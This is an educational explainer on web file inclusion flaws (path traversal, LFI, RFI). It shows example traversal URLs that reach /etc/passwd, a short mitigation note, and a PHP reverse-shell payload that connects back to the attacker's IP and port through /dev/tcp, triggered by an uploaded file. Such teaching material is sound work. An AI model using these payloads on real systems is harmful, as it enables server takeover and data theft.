File Inclusion

File Inclusion vulnerabilities are security weaknesses in web applications that allow an attacker to include and execute remote files, potentially leading to sensitive data exposure, server takeover, or other malicious actions, usually because of poor input validation.

Directory Traversal

Also known as Path Traversal, this vulnerability is a security weakness in web applications that allows an attacker to access files and directories outside of the intended directory or root folder, potentially leading to unauthorized disclosure or modification of sensitive data or system files. This vulnerability occurs when input parameters are not properly validated or sanitized.

Let's say you have a web application that serves files to authenticated users. The server stores user-uploaded files, usually text ones, and the application retrieves these files using a URL like this:

https://example.com/getfile.php?filename=myfile.txt

All we have to do to retrieve files elsewhere in the filesystem is simply to query them by going up said system :

https://example.com/getfile.php?filename=../../../../etc/passwd

To mitigate this vulnerability, the server-side code should validate and sanitize the input parameters to prevent any path traversal sequences from being used. One way to do this is to restrict the filename parameter to a whitelist of allowed characters or filenames and ensure that any path components are properly separated and validated.

Path traversal vulnerabilities can potentially allow an attacker to access any file or directory that is readable by the web server process and is outside of the intended directory or root folder. Here are some examples of directories or files that are commonly targeted using path traversal attacks:

1. Configuration files: An attacker may try to access configuration files such as wp-config.php for WordPress or settings.py for Django to extract sensitive information such as database credentials.

2. System files: An attacker may try to access system files such as /etc/passwd or /etc/shadow to extract sensitive information such as user account details or password hashes.

3. Application files: An attacker may try to access files such as index.php or default.aspx to modify the application's behavior or to upload malicious code.

4. Log files: An attacker may try to access log files such as access.log or error.log to learn more about the system and to identify potential vulnerabilities.

Local File Inclusion

Those follow the same core logic, but imply the ability to execute whatever file was sought.

Referring to our previous example, wha if, using the application's ability to upload custom profile pictures, I had previously uploaded a reverse shell akin to this instead of a legitimate image ?

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/[my_ip]/[my_open_port] 0>&1'");
php?>

All I would have to do then is to query my reverse shell, neatly located in the upload directory

https://example.com/getfile.php?filename=../../../../../uploads/revshell.php

And the reverse shell uploaded to the website will then connect back to my machine's open port.

Remote File Inclusion

Those (still) follow the same core logic, with the added implication that the files queried can be in remote locations ... like one's own computer. Still inkeeping with our previous examples, a RFI would allow me to query the following :

https://example.com/getfile.php?filename=../../../../../[my_ip]:[my_open_port]/revshell.php